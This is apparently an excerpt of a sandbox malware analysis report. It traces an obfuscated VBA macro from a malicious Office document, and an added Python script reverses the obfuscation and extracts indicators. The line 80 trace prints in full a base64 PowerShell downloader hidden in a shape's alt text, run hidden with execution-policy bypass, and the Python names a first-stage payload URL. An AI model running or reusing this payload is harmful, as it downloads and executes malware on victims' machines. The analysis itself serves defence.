               11   DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)
                    [executed] Len("\x0e\x03") -> 2
               12   lQbWzTrJtfhGiaS = pWNDRZbLZdGgl + CBool(5015) + Len(ChrW(1 + 1) + ChrW(2)) + LenB(Trim("XkBMzwHsSZswNPQMBDL")) + Len(SxZnBTiJkRBD)
                    [executed] Len("\x02\x02") -> 2
               14   tcZwqHFss = zTQlVkgJtJHVH + CBool(6903) + Len(ChrW(6 + 4) + ChrW(10)) + LenB(Trim("jDxtDndtrsCpNSNkxdJzhj")) + Len(RRdTnGKKsvm)
                    [executed] Len(" ") -> 2
               16   qDRjdabdvLvw = bDhgcvpVdcXNV + CBool(6163) + Len(ChrW(2 + 7) + ChrW(10)) + LenB(Trim("TisXGlccaikddjLpXZhn")) + Len(hVXaKsWdqGRalHZ)
                    [executed] Len(" ") -> 2
               18   TJgSBgQcFDq = xHtTibzqdL + CBool(6499) + Len(ChrW(2 + 7) + ChrW(1)) + LenB(Trim("iFvxjMCgcVJTWgGHG")) + Len(aQkXvbNzGWvh)
                    [executed] Len(" \x01") -> 2
               19   GWGjfdpJrxkg = PfFKPmwSmLwNT + CBool(2009) + Len(ChrW(4 + 7) + ChrW(6)) + LenB(Trim("kdHfDqVfHbpXcWBalpBj")) + Len(jwrLSVvTGmNgSNh)
                    [executed] Len("\x0b\x06") -> 2
               20   CCvSPPJWbrLcHS = ""
               22   fhjjZvgrrjq = mFGCJxVWBXjkl + CBool(1344) + Len(ChrW(8 + 10) + ChrW(3)) + LenB(Trim("bTZapLhFkwRKZPK")) + Len(SWsFlrFhBaHlgGg)
                    [executed] Len("\x12\x03") -> 2
               23   rjvFRbqzLtkzn = "" + ""
               25   GnxslaCGaT = qqmRcwgpqlk + CBool(6041) + Len(ChrW(1 + 2) + ChrW(7)) + LenB(Trim("FvacXVVTqjKJxgdZjv")) + Len(QdRJwGnCHinZ)
                    [executed] Len("\x03\x07") -> 2
               26   xDgzRpPhghWrJL = NfHHmGCha + CBool(347) + Len(ChrW(3 + 10) + ChrW(10)) + LenB(Trim("QRgSjBfjthjpDkPxVpmDlb")) + Len(jWwMxvjadBtl)
                    [executed] Len(" ") -> 2
               29   tTRXtXmcgPrktFh = jdmzHVMkcVXcdMP + CBool(5783) + Len(ChrW(2 + 10) + ChrW(10)) + LenB(Trim("rnkhGPWpTBpGNcVlk")) + Len(irVHvSQQvHtd)
                    [executed] Len("\x0c ") -> 2
               32   GhFdPWgpiqRj = CNLqTtpWDztqK + CBool(8793) + Len(ChrW(1 + 8) + ChrW(9)) + LenB(Trim("SXNhbQpQzmwVQlTmR")) + Len(RJaDmljLvpgjz)
                    [executed] Len(" ") -> 2
               36   LbZlvNQVaFtMi = vxPLFqFShhCqh + CBool(6141) + Len(ChrW(6 + 10) + ChrW(3)) + LenB(Trim("HahDZGNRJvHTcDKWPnnl")) + Len(zzfDDCMbPXrM)
                    [executed] Len("\x10\x03") -> 2
               38   SKKdjMpgJRQRK = "" + "" + Trim("")
               40   ppBLnCMSjnSV = fPSQKCwZHRJ + CBool(6767) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("cwZGhscSkqdkCDrjXnTS")) + Len(dmfMtsadBraSX)
                    [executed] Len("\x0f\x03") -> 2
               43   pzSpxTNqbhCwW = DVsGkQJsLPQCcZqt + CBool(1865) + Len(ChrW(2 + 8) + ChrW(6)) + LenB(Trim("kZNsfRinpsRKqfNnF")) + Len(laLlSgkFRvtad)
                    [executed] Len(" \x06") -> 2
               44   JtnpWHTxSiiz = aCwfgTJDmbRQW + CBool(6925) + Len(ChrW(9 + 10) + ChrW(2)) + LenB(Trim("dDWBignPNFqBkrjqZlKiT")) + Len(chdsMqJKtKM)
                    [executed] Len("\x13\x02") -> 2
               46   QmrcNWGaSgCWz = lFQtNLhczCraQG + CBool(3980) + Len(ChrW(3 + 8) + ChrW(6)) + LenB(Trim("VKvjZliFSGsfCGKhSf")) + Len(KPgHQGtPqLTjphCn)
                    [executed] Len("\x0b\x06") -> 2
               47   hdNxDVBxCTqQTpB = LTrim("")
               48   nFtNXRVXbdFr = VPWjviWKBpJi + CBool(7052) + Len(ChrW(4 + 5) + ChrW(8)) + LenB(Trim("VBjjdfMslCcHNgbjJa")) + Len(nBDKwlZJvRMwRR)
                    [executed] Len(" \x08") -> 2
               50   gLkHkMNJpWGPiM = qcmPmHlmdWZqj + CBool(194) + Len(ChrW(7 + 5) + ChrW(1)) + LenB(Trim("ZTTXLrVxkWNKjjPrfCj")) + Len(crtmLCNraQLF)
                    [executed] Len("\x0c\x01") -> 2
               51   zMzTwHmjJjndL = rDZKxGvDrNBJ + CBool(3433) + Len(ChrW(7 + 9) + ChrW(1)) + LenB(Trim("XaMLmrHxaSlqSXV")) + Len(ptlCjjDiKZ)
                    [executed] Len("\x10\x01") -> 2
               53   MNKsCVNXktg = hdJScJQgXmkm + CBool(2807) + Len(ChrW(7 + 5) + ChrW(9)) + LenB(Trim("RbRanmjXmLslKkZDlB")) + Len(WfkDLfGhqhWfhTN)
                    [executed] Len("\x0c ") -> 2
               54   nHMgbFSzmgv = TBWHlimLMV + CBool(7832) + Len(ChrW(9 + 8) + ChrW(10)) + LenB(Trim("LsHkNQtMsMzltJgPQgfkR")) + Len(JHxRSZaqkRwtHi)
                    [executed] Len("\x11 ") -> 2
               55   RJzJQGRzrc = ""
               58   MCFxxPbQXmfGfnL = NsLSSSLGDfkwlt + CBool(5937) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("SNpRVqvVcnPhX")) + Len(gJMqliiHCRNZQTc)
                    [executed] Len("\x0f\x03") -> 2
               59   LdnJwgZjbnKqtaa = aBBZDWsTDPPnS + CBool(8258) + Len(ChrW(7 + 3) + ChrW(4)) + LenB(Trim("faLQCswVKLgWjmJKg")) + Len(KmpHBhFRwlKKMm)
                    [executed] Len(" \x04") -> 2
               61   FHvwQsqqdgbr = wtDvZMrVDatsPG + CBool(8557) + Len(ChrW(6 + 1) + ChrW(4)) + LenB(Trim("lDjJcSLdkCqGrRzwdlKHLVHn")) + Len(qlkRQRpBTtrm)
                    [executed] Len("\x07\x04") -> 2
               62   CiRSdXZHwV = NKxZvdzbPWxxN + CBool(1618) + Len(ChrW(10 + 4) + ChrW(4)) + LenB(Trim("pJRTVfBcDhxrcwKkPDbFt")) + Len(wKPlSJwvvXqW)
                    [executed] Len("\x0e\x04") -> 2
               65   xVpspwsllZGqG = MpTBwVxXgdanm + CBool(5472) + Len(ChrW(1 + 3) + ChrW(5)) + LenB(Trim("KlilNHcTHfLXgQgkkRH")) + Len(tlWSglqmcgHrcq)
                    [executed] Len("\x04\x05") -> 2
               67   CWflqnrJbKVBj = RTrim("") + ""
               68   kkCTbdBcJnsGw = sFdLzbirFimt + CBool(6092) + Len(ChrW(6 + 7) + ChrW(8)) + LenB(Trim("cvXVCvgQfdqkdZkQwadmPMg")) + Len(acSnFqKQZJkgq)
                    [executed] Len(" \x08") -> 2
               70   cGvRqkvVFLFzsK = mChrRcSmQTlzbtd + CBool(476) + Len(ChrW(5 + 5) + ChrW(9)) + LenB(Trim("iXZiMssZcgzrHZrcFvVtk")) + Len(iixsSRWTqT)
                    [executed] Len(" ") -> 2
               74   QwXhZsRSjsaLm = FracTilLgHn + CBool(590) + Len(ChrW(4 + 8) + ChrW(7)) + LenB(Trim("MNhhbMhpCpvcwlCCWRgfhFc")) + Len(igrKGJjKXXfr)
                    [executed] Len("\x0c\x07") -> 2
               76   Set pNHbvwXpnbZvS = Shapes(Trim("h9mkae7"))
               77   dWDHaNGFDcG = iGKRcdzDwMZzqlWN + CBool(2417) + Len(ChrW(5 + 3) + ChrW(4)) + LenB(Trim("hDNlqMjmcDXrwkrDwq")) + Len(mQhXDqaHVLMab)
                    [executed] Len("\x08\x04") -> 2
               78   zVRvpZVSlZP = jxrRCZTpPSjqG + CBool(747) + Len(ChrW(9 + 2) + ChrW(3)) + LenB(Trim("wnkLGNvnwtBPGKxVMs")) + Len(HmbfaFbBPKWJstpW)
                    [executed] Len("\x0b\x03") -> 2
               80   VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + - 702)
                    [executed] CInt(351 * 2 + - 702) -> 0 (vbHide)
                    Replace(<AlternativeText>, "[", "A"), input:
                      P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand J[Bp[G4[cwB0[GE[bgBj[GU[I[[9[C[[WwBT[Hk[cwB0[GU[bQ[u[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CI[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[CI[KQ[7[[0[Cg[k[G0[ZQB0[Gg[bwBk[C[[PQ[g[Fs[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[F0[LgBH[GU[d[BN[GU[d[Bo[G8[Z[Bz[Cg[KQ[7[[0[CgBm[G8[cgBl[GE[YwBo[Cg[J[Bt[C[[aQBu[C[[J[Bt[GU[d[Bo[G8[Z[[p[Hs[DQ[K[[0[Cg[g[C[[aQBm[Cg[J[Bt[C4[TgBh[G0[ZQ[g[C0[ZQBx[C[[IgBE[G8[dwBu[Gw[bwBh[GQ[UwB0[HI[aQBu[Gc[Ig[p[Hs[DQ[K[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[MQ[3[DY[Lg[z[DI[Lg[z[DU[Lg[x[DY[Lw[3[D[[N[Bl[C4[c[Bo[H[[Ig[p[[0[Cg[g[C[[I[[g[C[[SQBF[Fg[K[[k[G0[LgBJ[G4[dgBv[Gs[ZQ[o[CQ[aQBu[HM[d[Bh[G4[YwBl[Cw[I[[o[CQ[dQBy[Gk[KQ[p[Ck[Ow[N[[o[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[[0[Cg[g[C[[fQ[N[[o[DQ[K[C[[I[Bp[GY[K[[k[G0[LgBO[GE[bQBl[C[[LQBl[HE[I[[i[EQ[bwB3[G4[b[Bv[GE[Z[BE[GE[d[Bh[CI[KQB7[[0[Cg[g[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[ZgBw[GU[d[By[GE[YQBy[GQ[ZQBs[Gw[YQ[u[GI[YQBu[GQ[LwB4[GE[c[Bf[DE[M[[y[GI[LQBB[Fo[MQ[v[Dc[M[[0[GU[LgBw[Gg[c[[/[Gw[PQBs[Gk[d[B0[GU[bg[0[C4[ZwBh[HM[Ig[p[[0[Cg[g[C[[I[[g[C[[J[By[GU[cwBw[G8[bgBz[GU[I[[9[C[[J[Bt[C4[SQBu[HY[bwBr[GU[K[[k[Gk[bgBz[HQ[YQBu[GM[ZQ[s[C[[K[[k[HU[cgBp[Ck[KQ[7[[0[Cg[N[[o[I[[g[C[[I[[g[CQ[c[Bh[HQ[a[[g[D0[I[Bb[FM[eQBz[HQ[ZQBt[C4[RQBu[HY[aQBy[G8[bgBt[GU[bgB0[F0[Og[6[Ec[ZQB0[EY[bwBs[GQ[ZQBy[F[[YQB0[Gg[K[[i[EM[bwBt[G0[bwBu[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bgBE[GE[d[Bh[CI[KQ[g[Cs[I[[i[Fw[X[BR[GQ[WgBH[F[[LgBl[Hg[ZQ[i[Ds[DQ[K[C[[I[[g[C[[I[Bb[FM[eQBz[HQ[ZQBt[C4[SQBP[C4[RgBp[Gw[ZQBd[Do[OgBX[HI[aQB0[GU[QQBs[Gw[QgB5[HQ[ZQBz[Cg[J[Bw[GE[d[Bo[Cw[I[[k[HI[ZQBz[H[[bwBu[HM[ZQ[p[Ds[DQ[K[[0[Cg[g[C[[I[[g[C[[J[Bj[Gw[cwBp[GQ[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[Ec[dQBp[GQ[I[[n[EM[M[[4[EE[RgBE[Dk[M[[t[EY[MgBB[DE[LQ[x[DE[R[[x[C0[O[[0[DU[NQ[t[D[[M[BB[D[[Qw[5[DE[Rg[z[Dg[O[[w[Cc[DQ[K[C[[I[[g[C[[I[[k[HQ[eQBw[GU[I[[9[C[[WwBU[Hk[c[Bl[F0[Og[6[Ec[ZQB0[FQ[eQBw[GU[RgBy[G8[bQBD[Ew[UwBJ[EQ[K[[k[GM[b[Bz[Gk[Z[[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[g[D0[I[Bb[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CQ[d[B5[H[[ZQ[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[u[EQ[bwBj[HU[bQBl[G4[d[[u[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bg[u[FM[a[Bl[Gw[b[BF[Hg[ZQBj[HU[d[Bl[Cg[J[Bw[GE[d[Bo[Cw[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[D[[KQ[N[[o[DQ[K[C[[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[C[[I[[g[C[[I[[N[[o[I[[g[H0[DQ[K[H0[DQ[K[[0[CgBF[Hg[aQB0[Ds[DQ[K[[0[Cg[=
                    output:
                      P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand 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
               81   lFbSwGcXvLj = ZcCmWkkqqB + CBool(3868) + Len(ChrW(10 + 10) + ChrW(7)) + LenB(Trim("GpsfXGHdXPiPBQWm")) + Len(CxtsBzHdKBGmb)
                    [executed] Len("\x14\x07") -> 2
               82   gQVFVamfZLZ = GgRgBdCqvLXk + CBool(260) + Len(ChrW(4 + 5) + ChrW(3)) + LenB(Trim("pSdvPiVsNHZWVbr")) + Len(ZxkaZVpVviNG)
                    [executed] Len(" \x03") -> 2
               85   XXDBdSGLmXrT = kkfQTPTJpjjs + CBool(9051) + Len(ChrW(4 + 6) + ChrW(1)) + LenB(Trim("RkTPBgXDhBTgMXtKSb")) + Len(bvfFxpHJWlX)
                    [executed] Len(" \x01") -> 2
               87   rhfWlBhJNxhXd = DbfBblNVjZrSd + CBool(7064) + Len(ChrW(10 + 10) + ChrW(6)) + LenB(Trim("MwstcPJvhangVNZapdZ")) + Len(jfPdPngPqkfl)
                    [executed] Len("\x14\x06") -> 2
               88   PrBtRSHfsVF = PDvGhnzPcxhD + CBool(1483) + Len(ChrW(5 + 8) + ChrW(1)) + LenB(Trim("tvjtZQfzHdgNNRHZqilSN")) + Len(JJLiShTtqxhXr)
                    [executed] Len(" \x01") -> 2
               93   fXsWigQMrcFc = mxpJbmSSQ + CBool(5222) + Len(ChrW(10 + 8) + ChrW(10)) + LenB(Trim("rdlmccJkfVhXRccQBM")) + Len(RkVtwCRbFKwknG)
                    [executed] Len("\x12 ") -> 2
               94   dgDaZRkBlQp = MvZcVWwwaGt + CBool(5297) + Len(ChrW(4 + 6) + ChrW(5)) + LenB(Trim("VgBdpkxSLXdGbgLKh")) + Len(qNJnfcLpkQXcp)
                    [executed] Len(" \x05") -> 2
               96   wdTqKxXzraCs = mkaDKJfCfVRm + CBool(8379) + Len(ChrW(1 + 10) + ChrW(5)) + LenB(Trim("klTWfaFrtslwGtgadMj")) + Len(GvivfXcsHC)
                    [executed] Len("\x0b\x05") -> 2
              101   End Sub
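Line 80 reconstructs the command line at run time: the shape named h9mkae7 (line 76) stores it as AlternativeText with every A replaced by [, the macro swaps them back with Replace(), and cmd.exe strips the ^ escapes before powershell.exe sees POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand ... (the child's command line in the process listing above). The -encodedcommand argument is base64 of the script in UTF-16LE. The Python below is an added example, not part of the Joe Sandbox report, that reverses that chain and then pulls URLs, CLSIDs and executable names out of the decoded script. Its sample input is constructed: the report's own cmd.exe prefix followed by an encoding of a harmless stand-in script, because the real blob is elided in this export; the only genuine report data it decodes is the first 24 characters of the Replace() input, which come out as $instance. Function names and the IOC regexes are the example's own.

```python
import base64
import re
from typing import Dict, List

# Line 76 fetches the shape named "h9mkae7"; line 80 passes
# Replace(shape.AlternativeText, "[", "A") to VBA.Shell. The functions below
# reverse that chain one step at a time.


def undo_bracket_substitution(alt_text: str) -> str:
    """Reverse the author's Replace(): every '[' stored in the alt text was an 'A'."""
    return alt_text.replace("[", "A")


def cmd_unescape(line: str) -> str:
    """Apply cmd.exe's caret rules ('^^' -> '^', '^x' -> 'x'), so B^^^yp^ass -> B^ypass."""
    out: List[str] = []
    i = 0
    while i < len(line):
        if line[i] == "^" and i + 1 < len(line):
            out.append(line[i + 1])  # the escaped character survives, the caret does not
            i += 2
        else:
            out.append(line[i])
            i += 1
    return "".join(out)


# -e, -ec, -enc ... -EncodedCommand, followed by the base64 argument
ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|en\w*)\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[A-Za-z0-9._\-]+(?::\d+)?(?:/[^\s\"'()]*)?")
GUID_RE = re.compile(r"[0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}")
EXE_RE = re.compile(r"[\w\\.]*\.exe", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """powershell -EncodedCommand takes base64 of the script encoded as UTF-16LE."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def extract_iocs(script: str) -> Dict[str, List[str]]:
    """Pull URLs, CLSIDs and .exe names out of the decoded script."""
    return {
        "urls": sorted(set(URL_RE.findall(script))),
        "clsids": sorted({g.upper() for g in GUID_RE.findall(script)}),
        "files": sorted(set(EXE_RE.findall(script))),
    }


def analyze_alt_text(alt_text: str) -> Dict[str, object]:
    """Full chain: Replace('[','A') -> cmd.exe unescape -> find -EncodedCommand -> decode -> IOCs."""
    cmd_line = cmd_unescape(undo_bracket_substitution(alt_text))
    match = ENCODED_ARG.search(cmd_line)
    if match is None:
        raise ValueError("no -EncodedCommand argument in the reconstructed command line")
    script = decode_encoded_command(match.group(1))
    return {"command_line": cmd_line, "script": script, "iocs": extract_iocs(script)}


def obfuscate_like_macro(script: str) -> str:
    """Inverse of the chain, used only to build the constructed sample below:
    UTF-16LE -> base64 -> 'A' becomes '[' (the form the document's alt text stores)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", "[")


# Constructed sample: the report's cmd.exe prefix with a stand-in script instead of
# the real (elided) payload; the stand-in only names the first-stage URL from the pcap.
SAMPLE_SCRIPT = '$u = "http://176.32.35.16/704e.php"; Write-Host "would IEX the body of $u"'
SAMPLE_ALT_TEXT = ("P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass "
                   "-encodedcommand " + obfuscate_like_macro(SAMPLE_SCRIPT))

# First 24 characters of the real alt text, as printed in the report's Replace() trace
REPORT_FRAGMENT = "J[Bp[G4[cwB0[GE[bgBj[GU["

if __name__ == "__main__":
    result = analyze_alt_text(SAMPLE_ALT_TEXT)
    print(result["command_line"])
    print(result["script"])
    print(result["iocs"])
    print(decode_encoded_command(undo_bracket_substitution(REPORT_FRAGMENT)))
```

Feeding the full Replace() input from the line 80 trace into analyze_alt_text() applies the same steps to the real sample; the IOC extraction is intentionally regex-based so it also works on scripts that build strings through GetMethods() lookups and concatenation, as this one does, as long as the literals are present in the decoded text.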


              Executed Functions

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.407933761.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ff00280000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: z#t
              • API String ID: 0-225707968
              • Opcode ID: ff7f1137b3b57dbc62ead6c73a19457c84f196de6cc991bc0e2c9b127a822824
              • Instruction ID: c6bd19652222f85aa4a72809d21aea39c08cdc86934f9132f8dcfe3388554470
              • Opcode Fuzzy Hash: ff7f1137b3b57dbc62ead6c73a19457c84f196de6cc991bc0e2c9b127a822824
              • Instruction Fuzzy Hash: E7F02270318B8C0FCB419B288884B68BBD1FB8F305F6902E9908ACB296CB348455C742
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions